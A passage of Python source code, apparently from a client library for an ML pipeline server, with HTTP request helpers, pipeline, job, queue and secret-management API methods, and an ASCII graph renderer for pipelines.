path: str,
args: Dict[str, Any],
add_prefix: bool,
files: Optional[Dict[str, IO[bytes]]],
api_version: Optional[int]) -> Dict[str, Any]:
prefix = ""
if add_prefix:
if api_version is None:
api_version = self._api_version
prefix = f"{PREFIX}/v{api_version}"
url = f"{self._url}{prefix}{path}"
headers = {
"authorization": self._token,
}
if method != METHOD_FILE and files is not None:
raise ValueError(
f"files are only allow for post (got {method}): {files}")
req = None
def check_error(req: Response) -> None:
if req.status_code == 403:
raise AccessDenied(req.text)
req.raise_for_status()
if req.headers["content-type"] == "application/problem+json":
raise ServerSideError(json.loads(req.text)["errMessage"])
try:
if method == METHOD_GET:
req = requests.get(url, params=args, headers=headers)
check_error(req)
return json.loads(req.text)
if method == METHOD_FILE:
if files is None:
raise ValueError(f"file method must have files: {files}")
req = requests.post(
url,
data=args,
files={
key: (
getattr(value, "name", key),
value,
"application/octet-stream",
) for (key, value) in files.items()
},
headers=headers)
check_error(req)
return json.loads(req.text)
if method == METHOD_POST:
req = requests.post(url, json=args, headers=headers)
check_error(req)
return json.loads(req.text)
if method == METHOD_PUT:
req = requests.put(url, json=args, headers=headers)
check_error(req)
return json.loads(req.text)
if method == METHOD_DELETE:
req = requests.delete(url, json=args, headers=headers)
check_error(req)
return json.loads(req.text)
if method == METHOD_LONGPOST:
args["token"] = self._token
try:
res = quick_server.worker_request(url, args)
if "errMessage" in res:
raise ServerSideError(res["errMessage"])
return res
except quick_server.WorkerError as e:
if e.get_status_code() == 403:
raise AccessDenied(e.args) from e
raise e
raise ValueError(f"unknown method {method}")
except json.decoder.JSONDecodeError as e:
if req is None:
raise
raise ValueError(req.text) from e
def request_bytes(
self,
method: str,
path: str,
args: Dict[str, Any],
files: Optional[Dict[str, BytesIO]] = None,
add_prefix: bool = True,
api_version: Optional[int] = None) -> Tuple[BytesIO, str]:
return self._raw_request_bytes(
method, path, args, files, add_prefix, api_version)
def _request_json(
self,
method: str,
path: str,
args: Dict[str, Any],
add_prefix: bool = True,
files: Optional[Dict[str, IO[bytes]]] = None,
api_version: Optional[int] = None) -> Dict[str, Any]:
return self._raw_request_json(
method, path, args, add_prefix, files, api_version)
def get_server_version(self) -> VersionResponse:
return cast(VersionResponse, self._raw_request_json(
METHOD_GET, f"{PREFIX}/v{API_VERSION}/version", {
}, add_prefix=False))
def set_maintenance_mode(
self, is_maintenance: bool) -> MaintenanceResponse:
"""Set the maintenance mode of the server
Args:
is_maintenance (bool): If the server should be in maintenance mode.
Returns:
MaintenanceResponse: MaintenanceResponse object.
"""
return cast(MaintenanceResponse, self._request_json(
METHOD_PUT, "/maintenance", {
"is_maintenance": is_maintenance,
}))
def get_maintenance_mode(self) -> MaintenanceResponse:
return cast(MaintenanceResponse, self._request_json(
METHOD_GET, "/maintenance", {}))
def get_pipelines(self) -> List[str]:
return [
res[0]
for res in self.get_pipeline_times(retrieve_times=False)[1]
]
def get_pipeline_ages(self) -> List[Tuple[str, str, str]]:
cur_time, pipelines = self.get_pipeline_times(retrieve_times=True)
return [
(pipe_id, get_age(cur_time, oldest), get_age(cur_time, latest))
for (pipe_id, oldest, latest) in sorted(pipelines, key=lambda el: (
safe_opt_num(el[1]), safe_opt_num(el[2]), el[0]))
]
def get_pipeline_times(
self,
retrieve_times: bool) -> Tuple[
float, List[Tuple[str, Optional[float], Optional[float]]]]:
obj = {}
if retrieve_times:
obj["retrieve_times"] = "1"
res = cast(PipelineList, self._request_json(
METHOD_GET, "/pipelines", obj))
return res["cur_time"], res["pipelines"]
def get_pipeline(self, pipe_id: str) -> 'PipelineHandle':
res = self._pipeline_cache.get(pipe_id)
if res is not None:
return res
res = PipelineHandle(self, pipe_id)
self._pipeline_cache[pipe_id] = res
return res
def get_node_defs(self) -> Dict[str, NodeDefInfo]:
self._maybe_refresh()
if self._node_defs is not None:
return self._node_defs
res = cast(NodeTypes, self._request_json(
METHOD_GET, "/node_types", {}))["info"]
self._node_defs = res
return res
def create_new_blob(self, blob_type: str) -> str:
return cast(BlobInit, self._request_json(
METHOD_POST, "/blob_init", {
"type": blob_type,
}))["blob"]
def create_new_pipeline(
self,
username: Optional[str] = None,
pipename: Optional[str] = None,
index: Optional[int] = None) -> str:
return cast(PipelineInit, self._request_json(
METHOD_POST, "/pipeline_init", {
"user": username,
"name": pipename,
"index": index,
}))["pipeline"]
def duplicate_pipeline(
self, pipe_id: str, dest_id: Optional[str] = None) -> str:
args = {
"pipeline": pipe_id,
}
if dest_id is not None:
args["dest"] = dest_id
return cast(PipelineDupResponse, self._request_json(
METHOD_POST, "/pipeline_dup", args))["pipeline"]
def set_pipeline(
self,
pipe_id: str,
defs: PipelineDef,
warnings_io: Optional[IO[Any]] = sys.stderr) -> 'PipelineHandle':
pipe_create = cast(PipelineCreate, self._request_json(
METHOD_POST, "/pipeline_create", {
"pipeline": pipe_id,
"defs": defs,
}))
pipe_id = pipe_create["pipeline"]
if warnings_io is not None:
warnings = pipe_create["warnings"]
if len(warnings) > 1:
warnings_io.write(
f"{len(warnings)} warnings while "
f"setting pipeline {pipe_id}:\n")
elif len(warnings) == 1:
warnings_io.write(
f"Warning while setting pipeline {pipe_id}:\n")
for warn in warnings:
warnings_io.write(f"{warn}\n")
if warnings:
warnings_io.flush()
return self.get_pipeline(pipe_id)
def update_settings(
self, pipe_id: str, settings: Dict[str, Any]) -> 'PipelineHandle':
pipe_id = cast(PipelineCreate, self._request_json(
METHOD_POST, "/update_pipeline_settings", {
"pipeline": pipe_id,
"settings": settings,
}))["pipeline"]
return self.get_pipeline(pipe_id)
def get_csvs(self) -> List[str]:
return cast(CSVList, self._request_json(
METHOD_GET, "/csvs", {
}))["csvs"]
def add_csv(self, csv_blob_id: str) -> List[str]:
return cast(CSVList, self._request_json(
METHOD_PUT, "/csvs", {
"blob": csv_blob_id,
}))["csvs"]
def remove_csv(self, csv_blob_id: str) -> List[str]:
return cast(CSVList, self._request_json(
METHOD_DELETE, "/csvs", {
"blob": csv_blob_id,
}))["csvs"]
def get_jobs(self) -> List[str]:
return cast(JobList, self._request_json(
METHOD_GET, "/jobs", {
}))["jobs"]
def remove_job(self, job_id: str) -> List[str]:
return cast(JobList, self._request_json(
METHOD_DELETE, "/job", {
"job": job_id,
}))["jobs"]
def create_job(self) -> JobInfo:
return cast(JobInfo, self._request_json(
METHOD_POST, "/job_init", {}))
def get_job(self, job_id: str) -> JobInfo:
return cast(JobInfo, self._request_json(
METHOD_GET, "/job", {
"job": job_id,
}))
def set_job(self, job: JobInfo) -> JobInfo:
return cast(JobInfo, self._request_json(
METHOD_PUT, "/job", {
"job": job,
}))
def get_allowed_custom_imports(self) -> CustomImportsResponse:
return cast(CustomImportsResponse, self._request_json(
METHOD_GET, "/allowed_custom_imports", {}))
@overload
def check_queue_stats( # pylint: disable=no-self-use
self,
pipeline: Optional[str],
minimal: Literal[True]) -> MinimalQueueStatsResponse:
...
@overload
def check_queue_stats( # pylint: disable=no-self-use
self,
pipeline: Optional[str],
minimal: Literal[False]) -> QueueStatsResponse:
...
@overload
def check_queue_stats( # pylint: disable=no-self-use
self,
pipeline: Optional[str],
minimal: bool) -> Union[
MinimalQueueStatsResponse, QueueStatsResponse]:
...
def check_queue_stats(
self,
pipeline: Optional[str] = None,
minimal: bool = False) -> Union[
MinimalQueueStatsResponse, QueueStatsResponse]:
if minimal:
return cast(MinimalQueueStatsResponse, self._request_json(
METHOD_GET, "/queue_stats", {
"pipeline": pipeline,
"minimal": 1,
}))
return cast(QueueStatsResponse, self._request_json(
METHOD_GET, "/queue_stats", {
"pipeline": pipeline,
"minimal": 0,
}))
def get_instance_status(
self,
pipe_id: Optional[str] = None,
node_id: Optional[str] = None) -> Dict[InstanceStatus, int]:
return cast(Dict[InstanceStatus, int], self._request_json(
METHOD_GET, "/instance_status", {
"pipeline": pipe_id,
"node": node_id,
}))
def get_queue_mode(self) -> str:
return cast(QueueMode, self._request_json(
METHOD_GET, "/queue_mode", {}))["mode"]
def set_queue_mode(self, mode: str) -> str:
return cast(QueueMode, self._request_json(
METHOD_PUT, "/queue_mode", {
"mode": mode,
}))["mode"]
def flush_all_queue_data(self) -> None:
def do_flush() -> bool:
res = cast(FlushAllQueuesResponse, self._request_json(
METHOD_POST, "/flush_all_queues", {}))
return bool(res["success"])
while do_flush(): # we flush until there is nothing to flush anymore
time.sleep(1.0)
def get_cache_stats(self) -> CacheStats:
return cast(CacheStats, self._request_json(
METHOD_GET, "/cache_stats", {}))
def reset_cache(self) -> CacheStats:
return cast(CacheStats, self._request_json(
METHOD_POST, "/cache_reset", {}))
def create_kafka_error_topic(self) -> KafkaTopics:
return cast(KafkaTopics, self._request_json(
METHOD_POST, "/kafka_topics", {
"num_partitions": 1,
}))
def delete_kafka_error_topic(self) -> KafkaTopics:
return cast(KafkaTopics, self._request_json(
METHOD_POST, "/kafka_topics", {
"num_partitions": 0,
}))
def read_kafka_errors(self, offset: str = "current") -> List[str]:
return cast(List[str], self._request_json(
METHOD_GET, "/kafka_msg", {
"offset": offset,
}))
def get_named_secret_keys(self) -> List[str]:
return cast(ListNamedSecretKeys, self._request_json(
METHOD_GET, "/named_secrets", {}))["keys"]
def set_named_secret(self, key: str, value: str) -> bool:
return cast(SetNamedSecret, self._request_json(
METHOD_PUT, "/named_secrets", {
"key": key,
"value": value,
}))["replaced"]
def get_error_logs(self) -> str:
with self._raw_request_str(METHOD_GET, "/error_logs", {}) as fin:
return fin.read()
# *** XYMEClientV3 ***
class PipelineHandle:
def __init__(
self,
client: XYMEClientV3,
pipe_id: str) -> None:
self._client = client
self._pipe_id = pipe_id
self._name: Optional[str] = None
self._company: Optional[str] = None
self._state: Optional[str] = None
self._is_high_priority: Optional[bool] = None
self._queue_mng: Optional[str] = None
self._nodes: Dict[str, NodeHandle] = {}
self._node_lookup: Dict[str, str] = {}
self._settings: Optional[Dict[str, Any]] = None
self._dynamic_error: Optional[str] = None
self._ins: Optional[List[str]] = None
self._outs: Optional[List[Tuple[str, str]]] = None
def refresh(self) -> None:
self._name = None
self._company = None
self._state = None
self._is_high_priority = None
self._queue_mng = None
self._ins = None
self._outs = None
# NOTE: we don't reset nodes
def _maybe_refresh(self) -> None:
if self._client.is_auto_refresh():
self.refresh()
def _maybe_fetch(self) -> None:
if self._name is None:
self._fetch_info()
def get_info(self) -> PipelineInfo:
return cast(PipelineInfo, self._client._request_json(
METHOD_GET, "/pipeline_info", {
"pipeline": self._pipe_id,
}))
def _fetch_info(self) -> None:
info = self.get_info()
self._name = info["name"]
self._company = info["company"]
self._state = info["state"]
self._is_high_priority = info["high_priority"]
self._queue_mng = info["queue_mng"]
self._settings = info["settings"]
self._ins = info["ins"]
self._outs = [(el[0], el[1]) for el in info["outs"]]
old_nodes = {} if self._nodes is None else self._nodes
self._nodes = {
node["id"]: NodeHandle.from_node_info(
self._client, self, node, old_nodes.get(node["id"]))
for node in info["nodes"]
}
self._node_lookup = {
node["name"]: node["id"]
for node in info["nodes"]
if node["name"] is not None
}
def get_nodes(self) -> List[str]:
self._maybe_refresh()
self._maybe_fetch()
return list(self._nodes.keys())
def get_node(self, node_id: str) -> 'NodeHandle':
self._maybe_refresh()
self._maybe_fetch()
node_id = self._node_lookup.get(node_id, node_id)
return self._nodes[node_id]
def get_id(self) -> str:
return self._pipe_id
def get_name(self) -> str:
self._maybe_refresh()
self._maybe_fetch()
assert self._name is not None
return self._name
def get_company(self) -> str:
self._maybe_refresh()
self._maybe_fetch()
assert self._company is not None
return self._company
def get_state_type(self) -> str:
self._maybe_refresh()
self._maybe_fetch()
assert self._state is not None
return self._state
def get_settings(self) -> Dict[str, Any]:
self._maybe_refresh()
self._maybe_fetch()
assert self._settings is not None
return self._settings
def get_timing(
self,
blacklist: Optional[List[str]] = None,
) -> Optional[TimingResult]:
blist = [] if blacklist is None else blacklist
node_timing: Dict[str, NodeTiming] = {}
nodes = self.get_nodes()
def get_filterd_times(
node_time: List[Timing]) -> Tuple[float, float, List[Timing]]:
fns = []
node_total = 0.0
for value in node_time:
if value["name"] not in blist:
fns.append(value)
node_total += value["total"]
if not fns:
return (0, 0, fns)
return (node_total, node_total / len(fns), fns)
pipe_total = 0.0
for node in nodes:
node_get = self.get_node(node)
node_time = node_get.get_timing()
node_name = node_get.get_node_def()["name"]
node_id = node_get.get_id()
node_total, avg_time, fns = get_filterd_times(node_time)
node_timing[node_id] = {
"node_name": node_name,
"node_total": node_total,
"node_avg": avg_time,
"fns": fns,
}
pipe_total += node_total
node_timing_sorted = sorted(
node_timing.items(),
key=lambda x: x[1]["node_total"],
reverse=True)
return {
"pipe_total": pipe_total,
"nodes": node_timing_sorted,
}
def is_high_priority(self) -> bool:
self._maybe_refresh()
self._maybe_fetch()
assert self._is_high_priority is not None
return self._is_high_priority
def is_queue(self) -> bool:
self._maybe_refresh()
self._maybe_fetch()
return self._queue_mng is not None
def get_queue_mng(self) -> Optional[str]:
self._maybe_refresh()
self._maybe_fetch()
return self._queue_mng
def get_ins(self) -> List[str]:
self._maybe_refresh()
self._maybe_fetch()
assert self._ins is not None
return self._ins
def get_outs(self) -> List[Tuple[str, str]]:
self._maybe_refresh()
self._maybe_fetch()
assert self._outs is not None
return self._outs
@contextlib.contextmanager
def bulk_operation(self) -> Iterator[bool]:
with self._client.bulk_operation() as do_refresh:
if do_refresh:
self.refresh()
yield do_refresh
def set_pipeline(self, defs: PipelineDef) -> None:
self._client.set_pipeline(self.get_id(), defs)
def update_settings(self, settings: Dict[str, Any]) -> None:
self._client.update_settings(self.get_id(), settings)
def dynamic_model(
self,
inputs: List[Any],
format_method: str = "simple",
no_cache: bool = False) -> List[Any]:
res = cast(DynamicResults, self._client._request_json(
METHOD_POST, "/dynamic_model", {
"format": format_method,
"inputs": inputs,
"no_cache": no_cache,
"pipeline": self._pipe_id,
}))
return res["results"]
def dynamic_list(
self,
inputs: List[Any],
input_key: Optional[str] = None,
output_key: Optional[str] = None,
split_th: Optional[int] = 1000,
max_threads: int = 50,
format_method: str = "simple",
force_keys: bool = False,
no_cache: bool = False) -> List[Any]:
if split_th is None or len(inputs) <= split_th:
res = cast(DynamicResults, self._client._request_json(
METHOD_POST, "/dynamic_list", {
"force_keys": force_keys,
"format": format_method,
"input_key": input_key,
"inputs": inputs,
"no_cache": no_cache,
"output_key": output_key,
"pipeline": self._pipe_id,
}))
return res["results"]
split_num: int = split_th
assert split_num > 0
res_arr: List[Any] = [None] * len(inputs)
exc: List[Optional[BaseException]] = [None]
active_ths: Set[threading.Thread] = set()
def compute_half(cur: List[Any], offset: int) -> None:
if exc[0] is not None:
return
if len(cur) <= split_num:
try:
cur_res = self.dynamic_list(
cur,
input_key=input_key,
output_key=output_key,
split_th=None,
max_threads=max_threads,
format_method=format_method,
force_keys=force_keys,
no_cache=no_cache)
res_arr[offset:offset + len(cur_res)] = cur_res
except BaseException as e: # pylint: disable=broad-except
exc[0] = e
return
half_ix: int = len(cur) // 2
args_first = (cur[:half_ix], offset)
args_second = (cur[half_ix:], offset + half_ix)
if len(active_ths) < max_threads:
comp_th = threading.Thread(
target=compute_half, args=args_first)
active_ths.add(comp_th)
comp_th.start()
compute_half(*args_second)
comp_th.join()
active_ths.remove(comp_th)
else:
compute_half(*args_first)
compute_half(*args_second)
compute_half(inputs, 0)
for remain_th in active_ths:
remain_th.join()
raise_e = exc[0]
try:
if isinstance(raise_e, BaseException):
raise raise_e # pylint: disable=raising-bad-type
except RequestException as e:
raise ValueError(
"request error while processing. processing time per batch "
"might be too large. try reducing split_th") from e
return res_arr
def dynamic(self, input_data: BytesIO) -> ByteResponse:
cur_res, ctype = self._client.request_bytes(
METHOD_FILE, "/dynamic", {
"pipeline": self._pipe_id,
}, files={
"file": input_data,
})
return interpret_ctype(cur_res, ctype)
def dynamic_obj(self, input_obj: Any) -> ByteResponse:
bio = BytesIO(json.dumps(
input_obj,
separators=(",", ":"),
indent=None,
sort_keys=True).encode("utf-8"))
return self.dynamic(bio)
def dynamic_async(
self, input_data: List[BytesIO]) -> List['ComputationHandle']:
names = [f"file{pos}" for pos in range(len(input_data))]
res: Dict[str, str] = self._client._request_json(
METHOD_FILE, "/dynamic_async", {
"pipeline": self._pipe_id,
}, files=dict(zip(names, input_data)))
return [
ComputationHandle(
self,
res[name],
self.get_dynamic_error_message,
self.set_dynamic_error_message)
for name in names]
def set_dynamic_error_message(self, msg: Optional[str]) -> None:
self._dynamic_error = msg
def get_dynamic_error_message(self) -> Optional[str]:
return self._dynamic_error
def dynamic_async_obj(
self, input_data: List[Any]) -> List['ComputationHandle']:
return self.dynamic_async([
BytesIO(json.dumps(
input_obj,
separators=(",", ":"),
indent=None,
sort_keys=True).encode("utf-8"))
for input_obj in input_data
])
def get_dynamic_result(self, data_id: str) -> ByteResponse:
try:
cur_res, ctype = self._client.request_bytes(
METHOD_GET, "/dynamic_result", {
"pipeline": self._pipe_id,
"id": data_id,
})
except HTTPError as e:
if e.response.status_code == 404:
raise KeyError(f"data_id {data_id} does not exist") from e
raise e
return interpret_ctype(cur_res, ctype)
def get_dynamic_status(
self,
data_ids: List['ComputationHandle'],
) -> Dict['ComputationHandle', QueueStatus]:
res = cast(DynamicStatusResponse, self._client._request_json(
METHOD_POST, "/dynamic_status", {
"data_ids": [data_id.get_id() for data_id in data_ids],
"pipeline": self._pipe_id,
}))
status = res["status"]
hnd_map = {data_id.get_id(): data_id for data_id in data_ids}
return {
hnd_map[key]: cast(QueueStatus, value)
for key, value in status.items()
}
def get_dynamic_bulk(
self,
input_data: List[BytesIO],
max_buff: int = 4000,
block_size: int = 5,
num_threads: int = 20) -> Iterable[ByteResponse]:
def get(hnd: 'ComputationHandle') -> ByteResponse:
return hnd.get()
success = False
try:
yield from async_compute(
input_data,
self.dynamic_async,
get,
lambda: self.check_queue_stats(minimal=True),
self.get_dynamic_status,
max_buff,
block_size,
num_threads)
success = True
finally:
if success:
self.set_dynamic_error_message(None)
def get_dynamic_bulk_obj(
self,
input_data: List[Any],
max_buff: int = 4000,
block_size: int = 5,
num_threads: int = 20) -> Iterable[ByteResponse]:
def get(hnd: 'ComputationHandle') -> ByteResponse:
return hnd.get()
success = False
try:
yield from async_compute(
input_data,
self.dynamic_async_obj,
get,
lambda: self.check_queue_stats(minimal=True),
self.get_dynamic_status,
max_buff,
block_size,
num_threads)
success = True
finally:
if success:
self.set_dynamic_error_message(None)
def pretty(
self, nodes_only: bool = False, allow_unicode: bool = True) -> str:
nodes = [
self.get_node(node_id)
for node_id in sorted(self.get_nodes())
]
already: Set[NodeHandle] = set()
order: List[NodeHandle] = []
outs: Dict[
NodeHandle,
List[Tuple[NodeHandle, str, str]],
] = collections.defaultdict(list)
start_pipe = "├" if allow_unicode else "|"
end_pipe = "├" if allow_unicode else "|"
before_pipe = "│" if allow_unicode else "|"
after_pipe = "│" if allow_unicode else "|"
pipe = "┤" if allow_unicode else "|"
corner_right = "┐" if allow_unicode else "\\"
corner_left = "┘" if allow_unicode else "/"
cont_right = "┬" if allow_unicode else "\\"
cont_left = "┴" if allow_unicode else "/"
cont_skip = "─" if allow_unicode else "-"
cont_pipe = "│" if allow_unicode else "|"
cont = "┼" if allow_unicode else "-"
start_left = "└" if allow_unicode else "\\"
bar = "─" if allow_unicode else "-"
vsec = "│" if allow_unicode else "|"
vstart = "├" if allow_unicode else "|"
vend = "┤" if allow_unicode else "|"
hsec = "─" if allow_unicode else "-"
tl = "┌" if allow_unicode else "+"
tr = "┐" if allow_unicode else "+"
bl = "└" if allow_unicode else "+"
br = "┘" if allow_unicode else "+"
conn_top = "┴" if allow_unicode else "-"
conn_bottom = "┬" if allow_unicode else "-"
space = " "
prefix_len = 2 if nodes_only else 3
indent = space * prefix_len
def topo(cur: NodeHandle) -> None:
if cur in already:
return
for in_key in sorted(cur.get_inputs()):
out_node, out_key = cur.get_input(in_key)
outs[out_node].append((cur, in_key, out_key))
topo(out_node)
already.add(cur)
order.append(cur)
for tnode in nodes:
topo(tnode)
in_states: Dict[NodeHandle, Dict[str, int]] = {}
order_lookup = {
node: pos for (pos, node) in enumerate(order)
}
def get_in_state(node: NodeHandle, key: str) -> int:
if node not in in_states:
in_states[node] = node.get_in_cursor_states()
return in_states[node].get(key, 0)
def draw_in_edges(
node: NodeHandle,
cur_edges: List[Tuple[Optional[NodeHandle], str, int]],
) -> Tuple[List[Tuple[Optional[NodeHandle], str, int]], str]:
gap = 0
prev_gap = 0
new_edges: List[Tuple[Optional[NodeHandle], str, int]] = []
segs: List[str] = []
for edge in cur_edges:
in_node, in_key, cur_gap = edge
before_gap = cur_gap
if in_node == node:
in_state = get_in_state(in_node, in_key)
cur_str = f"{end_pipe} {in_key} ({in_state}) "
new_edges.append((None, in_key, cur_gap))
else:
cur_str = before_pipe if in_node is not None else ""
cur_gap += gap
gap = 0
new_edges.append((in_node, in_key, cur_gap))
segs.append(f"{space * prev_gap}{cur_str}")
prev_gap = max(0, before_gap - len(cur_str))
while new_edges:
if new_edges[-1][0] is None:
new_edges.pop()
else:
break
return new_edges, "".join(segs)
def draw_out_edges(
node: NodeHandle,
cur_edges: List[Tuple[Optional[NodeHandle], str, int]],
) -> Tuple[List[Tuple[Optional[NodeHandle], str, int]], str]:
new_edges: List[Tuple[Optional[NodeHandle], str, int]] = []
segs: List[str] = []
prev_gap = 0
for edge in cur_edges:
cur_node, _, cur_gap = edge
cur_str = after_pipe if cur_node is not None else ""
segs.append(f"{space * prev_gap}{cur_str}")
new_edges.append(edge)
prev_gap = max(0, cur_gap - len(cur_str))
sout = sorted(
outs[node], key=lambda e: order_lookup[e[0]], reverse=True)
for (in_node, in_key, out_key) in sout:
cur_str = f"{start_pipe} {out_key} "
in_state = get_in_state(in_node, in_key)
end_str = f"{end_pipe} {in_key} ({in_state}) "
segs.append(f"{space * prev_gap}{cur_str}")
cur_gap = max(len(cur_str), len(end_str))
new_edges.append((in_node, in_key, cur_gap))
prev_gap = max(0, cur_gap - len(cur_str))
return new_edges, "".join(segs)
def draw() -> List[str]:
lines: List[str] = []
edges: List[Tuple[Optional[NodeHandle], str, int]] = []
for node in order:
top_gaps = [edge[2] for edge in edges[:-1]]
top_nodes = [edge[0] for edge in edges]
same_ids = [edge[0] == node for edge in edges]
empty_top = [edge[0] is None for edge in edges]
edges, in_line = draw_in_edges(node, edges)
in_line = in_line.rstrip()
if in_line:
lines.append(f"{indent}{in_line}")
edges, out_line = draw_out_edges(node, edges)
bottom_gaps = [edge[2] for edge in edges[:-1]]
empty_bottom = [edge[0] is None for edge in edges]
new_bottom = [
eix >= len(top_nodes) or (
edge[0] is not None and top_nodes[eix] != edge[0]
) for (eix, edge) in enumerate(edges)
]
line_indents: List[str] = []
started = False
had_same = False
highest_iix = -1
for (iix, top_gap) in enumerate(top_gaps):
if same_ids[iix]:
had_same = True
if had_same and iix >= len(bottom_gaps):
break
if not line_indents:
line_indents.append(indent)
if empty_top[iix]:
cur_connect = cont_skip if started else space
elif iix >= len(empty_bottom) or empty_bottom[iix]:
if started:
cur_connect = cont_left
else:
cur_connect = start_left
if len(bottom_gaps) < len(top_gaps):
break
started = True
else:
if started:
cur_connect = cont_skip
else:
cur_connect = cont_pipe
cur_line = cont_skip if started else space
gap_size = top_gap - len(cur_connect)
line_indents.append(f"{cur_connect}{cur_line * gap_size}")
highest_iix = iix
if line_indents:
line_indents[-1] = line_indents[-1][:-len(indent)]
if nodes_only:
mid = f" {node.get_short_status(allow_unicode)} "
else:
mid = \
f"{node.get_short_status(allow_unicode)} " \
f"{node.get_name()}({node.get_type()}) " \
f"{node.get_highest_chunk()}"
if len(mid) < prefix_len:
mid = f"{mid}{space * (prefix_len - len(mid))}"
content = f"{vend if started else vsec}{mid}{vsec}"
node_line = f"{''.join(line_indents)}{content}"
top_indents: List[str] = []
bottom_indents: List[str] = []
for iix in range(highest_iix + 1):
top_connect = space if empty_top[iix] else cont_pipe
has_bottom = iix >= len(empty_bottom) or empty_bottom[iix]
bottom_connect = space if has_bottom else cont_pipe
top_gap_size = top_gaps[iix] - len(top_connect)
bottom_gap_size = top_gaps[iix] - len(bottom_connect)
if not top_indents:
top_indents.append(indent)
top_indents.append(f"{top_connect}{space * top_gap_size}")
if not bottom_indents:
bottom_indents.append(indent)
bottom_indents.append(
f"{bottom_connect}{space * bottom_gap_size}")
if top_indents:
top_indents[-1] = top_indents[-1][:-len(indent)]
if bottom_indents:
bottom_indents[-1] = bottom_indents[-1][:-len(indent)]
border_len = len(content) - len(tl) - len(tr)
top_border: List[str] = [tl] + [hsec] * border_len + [tr]
top_ix = len(indent)
for iix in range(highest_iix + 1, len(same_ids)):
if top_ix >= len(top_border):
break
if same_ids[iix]:
top_border[top_ix] = conn_top
if iix >= len(top_gaps):
break
top_ix += top_gaps[iix]
bottom_border: List[str] = [bl] + [hsec] * border_len + [br]
bottom_ix = len(indent)
for iix in range(highest_iix + 1, len(new_bottom)):
if bottom_ix >= len(bottom_border):
break
if new_bottom[iix]:
bottom_border[bottom_ix] = conn_bottom
if iix >= len(bottom_gaps):
break
bottom_ix += bottom_gaps[iix]
node_top = f"{''.join(top_indents)}{''.join(top_border)}"
node_bottom = \
f"{''.join(bottom_indents)}{''.join(bottom_border)}"
total_gap_top = sum(top_gaps) - len(node_line)
total_gap_bottom = sum(bottom_gaps) - len(node_line)
if total_gap_bottom > total_gap_top:
connector = corner_right
more_gaps = bottom_gaps
top_conn = space
bottom_conn = cont_pipe
else:
connector = corner_left
more_gaps = top_gaps
top_conn = cont_pipe
bottom_conn = space
if total_gap_bottom == total_gap_top:
connector = pipe
more_gaps = bottom_gaps
top_conn = cont_pipe
bottom_conn = cont_pipe
total_gap = max(total_gap_bottom, total_gap_top)
if total_gap >= -prefix_len:
bar_len = total_gap + prefix_len
full_bar = list(bar * bar_len)
full_top = list(space * bar_len)
full_bottom = list(space * bar_len)
bar_ix = prefix_len - len(node_line)
for (before_gap_ix, bar_gap) in enumerate(more_gaps):
bar_ix += bar_gap
if bar_ix < 0:
continue
if bar_ix >= len(full_bar):
break
gap_ix = before_gap_ix + 1
if gap_ix < len(same_ids) and not same_ids[gap_ix]:
mid_connector = cont_skip
mid_top = cont_pipe
mid_bottom = cont_pipe
else:
mid_connector = cont
mid_top = cont_pipe
mid_bottom = cont_pipe
adj_ix = bar_ix - prefix_len
if total_gap_bottom >= adj_ix > total_gap_top:
mid_connector = cont_right
mid_top = space
elif total_gap_bottom < adj_ix <= total_gap_top:
if not empty_top[gap_ix]:
mid_connector = cont_left
else:
mid_top = space
mid_bottom = space
full_bar[bar_ix] = mid_connector
full_top[bar_ix] = mid_top
full_bottom[bar_ix] = mid_bottom
node_line = \
f"{node_line[:-len(vsec)]}{vstart}" \
f"{''.join(full_bar)}{connector}"
node_top = f"{node_top}{''.join(full_top)}{top_conn}"
node_bottom = \
f"{node_bottom}{''.join(full_bottom)}{bottom_conn}"
lines.append(node_top.rstrip())
lines.append(node_line)
lines.append(node_bottom.rstrip())
out_line = out_line.rstrip()
if out_line:
lines.append(f"{indent}{out_line}")
return lines
return "\n".join(draw())
def get_def(
self,
full: bool = True,
warnings_io: Optional[IO[Any]] = sys.stderr) -> PipelineDef:
res = cast(PipelineDef, self._client._request_json(
METHOD_GET, "/pipeline_def", {
"pipeline": self.get_id(),
"full": 1 if full else 0,
}))
# look for warnings
def s3_warnings(
kind: str,
settings: Dict[str, Dict[str, Any]],
warnings: List[str]) -> None:
s3_settings = settings.get(kind, {})
for (key, s3_setting) in s3_settings.items():
warnings.extend((
f"{kind}:{key}: {warn}"
for warn in s3_setting.get("warnings", [])
))
if warnings_io is not None:
settings = res.get("settings", {})
warnings: List[str] = []
s3_warnings("s3", settings, warnings)
s3_warnings("triton", settings, warnings)
if len(warnings) > 1:
warnings_io.write(
f"{len(warnings)} warnings while "
f"reconstructing settings:\n")
elif len(warnings) == 1:
warnings_io.write(
"Warning while reconstructing settings:\n")
for warn in warnings:
warnings_io.write(f"{warn}\n")
if warnings:
warnings_io.flush()
return res
def set_attr(
self,
attr: str,
value: Any) -> None:
pipe_def = self.get_def()
pipe_def[attr] = value # type: ignore
self._client.set_pipeline(self.get_id(), pipe_def)
def set_name(self, value: str) -> None:
self.set_attr("name", value)
def set_company(self, value: str) -> None:
self.set_attr("company", value)
def set_state(self, value: str) -> None:
self.set_attr("state", value)
def set_high_priority(self, value: bool) -> None:
self.set_attr("high_priority", value)
def set_queue_mng(self, value: Optional[str]) -> None:
self.set_attr("queue_mng", value)
def get_visible_blobs(self) -> List[str]:
return [
res[0]
for res in self.get_visible_blob_times(retrieve_times=False)[1]
]
def get_visible_blob_ages(self) -> List[Tuple[str, str]]:
cur_time, visible = self.get_visible_blob_times(retrieve_times=True)
return [
(blob_id, get_age(cur_time, blob_time))
for (blob_id, blob_time) in sorted(visible, key=lambda el: (
safe_opt_num(el[1]), el[0]))
]
def get_visible_blob_times(self, retrieve_times: bool) -> Tuple[
float, List[Tuple[str, Optional[float]]]]:
res = cast(VisibleBlobs, self._client._request_json(
METHOD_GET, "/visible_blobs", {
"pipeline": self.get_id(),
"retrieve_times": int(retrieve_times),
}))
return res["cur_time"], res["visible"]
@overload
def check_queue_stats( # pylint: disable=no-self-use
self, minimal: Literal[True]) -> MinimalQueueStatsResponse:
...
@overload
def check_queue_stats( # pylint: disable=no-self-use
self, minimal: Literal[False]) -> QueueStatsResponse:
...
@overload
def check_queue_stats( # pylint: disable=no-self-use
self,
minimal: bool) -> Union[
MinimalQueueStatsResponse, QueueStatsResponse]:
...
def check_queue_stats(self, minimal: bool) -> Union[
MinimalQueueStatsResponse, QueueStatsResponse]:
pipe_id: Optional[str] = self.get_id()
return self._client.check_queue_stats(pipe_id, minimal=minimal)
def scale_worker(self, replicas: int) -> bool:
return cast(WorkerScale, self._client._request_json(
